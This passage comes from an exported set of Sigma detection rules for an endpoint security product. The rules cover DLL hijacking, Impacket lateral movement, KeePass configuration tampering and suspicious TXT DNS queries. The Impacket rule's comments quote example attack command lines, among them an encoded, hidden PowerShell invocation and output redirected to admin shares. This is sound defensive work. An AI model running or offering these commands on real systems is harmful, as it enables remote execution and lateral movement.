'\\DEVRTL.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c",
"rule_name": "DLL Hijacking via drvinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via drvinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10c14723-61c7-4c75-92ca-9af245723ad2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628613Z",
"creation_date": "2026-03-23T11:45:34.628615Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628619Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py",
"https://attack.mitre.org/software/S0357/"
],
"name": "t1047_impacket_lateral_movement.yml",
"content": "title: Impacket Lateral Movement Detected\nid: 10c14723-61c7-4c75-92ca-9af245723ad2\ndescription: |\n Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\n Impacket is a collection of Python classes for working with network protocols.\n Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.\n It is often used by threat actors to perform lateral movements.\n It is recommended investigate the process tree for suspicious activities.\n Is is also recommended to investigate the network type authentications at the same time in order to get the IP address of the computer from which the lateral movement comes from.\nreferences:\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py\n - https://attack.mitre.org/software/S0357/\ndate: 2019/09/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - attack.s0357\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_other:\n # *** wmiexec.py\n # parent is wmiprvse.exe\n # examples:\n # cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # cmd.exe /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # *** dcomexec.py -object MMC20\n # parent is mmc.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567442499.05 2>&1\n # *** dcomexec.py -object ShellBrowserWindow\n # runs %SystemRoot%\\System32\\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1567520103.71 2>&1\n # *** smbexec.py\n # parent is services.exe\n # example:\n # C:\\Windows\\system32\\cmd.exe /Q /c echo tasklist ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat\n # C:\\Windows\\system32\\cmd.exe /Q /c powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAdwBoAG8AYQBtAGkA 1> \\\\127.0.0.1\\ADMIN$\\__1615559515.6162736 2>&1\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # dcomexec MMC\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine:\n # wmiexec.py and dcomexec.py\n - '*cmd.exe* /Q /c * 1> \\\\\\\\127.0.0.1\\\\* 2>&1'\n # smbexec.py\n - '*cmd.exe* /Q /c * ^> \\\\\\\\127.0.0.1\\\\* 2^>^&1 > *'\n - '*powershell.exe* -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsA*'\n\n selection_atexec:\n ParentCommandLine|contains:\n - 'svchost.exe -k netsvcs' # atexec on win10 (parent can be \"C:\\Windows\\system32\\svchost.exe -k netsvcs\" or \"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\")\n - 'taskeng.exe' # atexec on win7 (parent is \"taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\\System:Service:\")\n # cmd.exe /C tasklist /m > C:\\Windows\\Temp\\bAJrYQtL.tmp 2>&1\n CommandLine: 'cmd.exe /C *Windows\\\\Temp\\\\*&1'\n\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10c14723-61c7-4c75-92ca-9af245723ad2",
"rule_name": "Impacket Lateral Movement Detected",
"rule_description": "Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\nImpacket is a collection of Python classes for working with network protocols.\nImpacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.\nIt is often used by threat actors to perform lateral movements.\nIt is recommended investigate the process tree for suspicious activities.\nIs is also recommended to investigate the network type authentications at the same time in order to get the IP address of the computer from which the lateral movement comes from.\n",
"rule_creation_date": "2019-09-03",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1021.003",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10c34848-23dc-4d3c-a8e7-187197b79a2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621563Z",
"creation_date": "2026-03-23T11:45:34.621565Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621569Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://blog.slowerzs.net/posts/thievingfox/",
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1555_005_keepass_executable_config_write.yml",
"content": "title: KeePass Executable Configuration Modified by an External Tool\nid: 10c34848-23dc-4d3c-a8e7-187197b79a2d\ndescription: |\n Detects a modification of the KeePass.exe.config file that could lead to credential theft.\n Attackers may modify KeePass' configuration file which defines the behavior of the .NET runtime by switching native function pointers by malicious ones in order to dump the password database.\n It is recommended to check the file content for any added lines that could indicate a compromise.\nreferences:\n - https://blog.slowerzs.net/posts/thievingfox/\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/02/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: file_write\ndetection:\n selection:\n Path|endswith: '\\KeePass.exe.config'\n\n filter_keepass:\n ProcessOriginalFileName: 'KeePass.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Certum Code Signing 2021 CA'\n - 'Open Source Developer, Dominik Reichl'\n\n exclusion_sysytem:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_msiexec:\n ProcessImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\Syswow64\\msiexec.exe'\n\n exclusion_explorer:\n ProcessImage: '?:\\Windows\\explorer.exe'\n\n exclusion_vsssvc:\n ProcessImage: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_7z:\n ProcessImage|endswith:\n - '\\7z.exe'\n - '\\7zG.exe'\n - '\\7zM.exe'\n - '\\7zFM.exe'\n ProcessCompany: 'Igor Pavlov'\n ProcessDescription:\n - '7-Zip Console'\n - '7-Zip GUI'\n - '7-Zip File Manager'\n\n exclusion_winrar:\n ProcessOriginalFileName: 'WinRAR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'win.rar GmbH'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_dllhost:\n # Used when copy file from explorer when UAC is enabled\n ProcessImage: '?:\\Windows\\system32\\DllHost.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_ivanti:\n ProcessParentImage: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistps1.exe'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_robocopy:\n ProcessOriginalFileName: 'robocopy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10c34848-23dc-4d3c-a8e7-187197b79a2d",
"rule_name": "KeePass Executable Configuration Modified by an External Tool",
"rule_description": "Detects a modification of the KeePass.exe.config file that could lead to credential theft.\nAttackers may modify KeePass' configuration file which defines the behavior of the .NET runtime by switching native function pointers by malicious ones in order to dump the password database.\nIt is recommended to check the file content for any added lines that could indicate a compromise.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601524Z",
"creation_date": "2026-03-23T11:45:34.601528Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601536Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cscript.yml",
"content": "title: DLL Hijacking via cscript.exe\nid: 112484b0-ac5d-40a8-a775-0a918f1aa7f1\ndescription: |\n Detects potential Windows DLL Hijacking via cscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1",
"rule_name": "DLL Hijacking via cscript.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1129f074-5b01-412c-9fae-a3a2a3b01770",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087075Z",
"creation_date": "2026-03-23T11:45:34.087078Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087084Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east",
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_secur32.yml",
"content": "title: Suspicious secur32.dll Loaded\nid: 1129f074-5b01-412c-9fae-a3a2a3b01770\ndescription: |\n Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/05\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\secur32.dll'\n sha256|contains: '?' # At least one character, some SHA256 are empty\n\n filter_signed_microsoft:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_commonfolders:\n ImageLoaded:\n - '?:\\Windows\\WinSxS\\\\*'\n - '?:\\Windows\\System32\\secur32.dll'\n - '?:\\Windows\\syswow64\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\secur32.dll'\n - '\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\windows\\system32\\secur32.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\secur32.dll'\n\n exclusion_siemens:\n ImageLoaded:\n - '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n - '?:\\PROGRA~2\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n Image|startswith: '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\'\n\n exclusion_elisath:\n Image:\n - '?:\\Elisath\\Gestion\\Gestion.exe'\n - '?:\\Elisath\\Caisse\\Caisse.exe'\n ImageLoaded:\n - '?:\\Elisath\\Gestion\\secur32.dll'\n - '?:\\Elisath\\Caisse\\secur32.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1129f074-5b01-412c-9fae-a3a2a3b01770",
"rule_name": "Suspicious secur32.dll Loaded",
"rule_description": "Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-05",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1181e4c8-56a6-49c2-971f-caa5665133a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626425Z",
"creation_date": "2026-03-23T11:45:34.626427Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626431Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_suspicious_txt_dns_linux.yml",
"content": "title: Suspicious TXT DNS Resolution (Linux)\nid: 1181e4c8-56a6-49c2-971f-caa5665133a3\ndescription: |\n Detects a suspicious TXT DNS request that could be related to an implant communication.\n Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n It is recommended to analyze the process at the origin of the request for malicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2024/04/02\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryType: 'TXT'\n QueryStatusCategory: 'success'\n TextRecords|contains: '?'\n ProcessImage|contains: '?'\n\n filter_mail:\n TextRecords|contains:\n - 'v=DKIM1'\n - 'v=spf1'\n - 'k=rsa'\n - 'v=DMARC1'\n - 'dkim=unknown'\n\n filter_site_verification:\n TextRecords|contains:\n - 'apple-domain-verification='\n - 'google-site-verification='\n - 'facebook-domain-verification='\n - 'adobe-idp-site-verification='\n - 'MS=ms????????'\n\n filter_know_requested_name:\n QueryName:\n - 'version.bind'\n - 'hostname.bind'\n\n filter_know_requested_name_endswith:\n QueryName|endswith:\n - '.local'\n - 'whoami.cloudflare.com'\n - 'o-o.myaddr.l.google.com'\n - '.psbl.surriel.com' # Passive spam blocklist\n - '.cbl.abuseat.org' # The Abuseat CBL (Composite Blocking List)\n - 'engine._segment._tcp.steelseries.com'\n - 'config.nos.avast.com.'\n - 'config.nos.avast.com'\n - '_nos._tcp.nos.avast.com.'\n - '_nos._tcp.nos.avast.com'\n - '.logmein-gateway.com'\n - 'current.cvd.clamav.net'\n - '.asn.rspamd.com'\n - '.asn.cymru.com'\n - 'secpoll.powerdns.com'\n - 'wgs.prod.surfshark.com'\n - 'push.apple.com'\n - '.pci.id.ucw.cz'\n - '.sophosxl.net'\n\n filter_mailer:\n - ProcessCommandLine|contains:\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/amavisd'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/milter-greylist'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim4'\n - 'MailScanner: starting child'\n - '/usr/bin/perl -U -I /usr/share/MailScanner/perl /usr/sbin/MailScanner /etc/MailScanner/MailScanner.conf'\n - '/opt/zimbra/common/sbin/amavisd'\n - 'MailScanner: ' # MailScanner: waiting for messages\n - '/usr/bin/spamd'\n - '/usr/bin/perl -T -w /usr/bin/spamd '\n - '/usr/bin/perl /usr/bin/pmg-smtp-filter'\n - 'spamd child'\n - Image:\n - '/usr/sbin/milter-greylist'\n - '/usr/lib/postfix/sbin/smtpd'\n - '/usr/libexec/postfix/smtpd'\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim'\n - '/usr/sbin/exim4'\n - '/usr/bin/rspamd'\n\n filter_dns:\n Image:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n - '/usr/sbin/dig'\n - '/usr/bin/dig'\n - '/usr/local/nessy2/bin/named'\n\n filter_amazon_ses:\n # xxx._domainkey.yyy.com , type TXT, redirects through a CNAME to xxx.dkip.amazonses.com\n QueryName: '????????????????????????????????._domainkey.*'\n TextRecords: 'p=MI*' # contains a public key\n\n exclusion_image:\n ProcessImage:\n - '/opt/nessus/sbin/nessusd'\n - '/usr/bin/figal-client'\n - '/usr/bin/figal-sitename'\n - '*/rapid7/nexpose/nsc/.DLLCACHE/nexserv'\n - '/usr/bin/mongorestore'\n - '/usr/libexec/sssd/sssd_be'\n - '/usr/sbin/lshw'\n - '/usr/local/bin/forgejo'\n - '/usr/libexec/postfix/smtpd'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/usr/bin/cloudflared'\n - '/usr/local/bin/cloudflared'\n\n exclusion_scan:\n # version.bind\n TextRecords: 'unbound ?.??.?'\n\n exclusion_spamcop:\n TextRecords|startswith: 'Blocked - see https://www.spamcop.net/bl.shtml?'\n\n exclusion_dkim:\n TextRecords|contains:\n - 'p=MIGf'\n - 'p= MIGf'\n - 'p=MIIBIj'\n - 'p= MIIBIj'\n QueryName|contains: '._domainkey.'\n\n exclusion_brevo:\n TextRecords|contains: 'brevo-code:??????????????????????'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1181e4c8-56a6-49c2-971f-caa5665133a3",
"rule_name": "Suspicious TXT DNS Resolution (Linux)",
"rule_description": "Detects a suspicious TXT DNS request that could be related to an implant communication.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nIt is recommended to analyze the process at the origin of the request for malicious activities.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2026-01-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
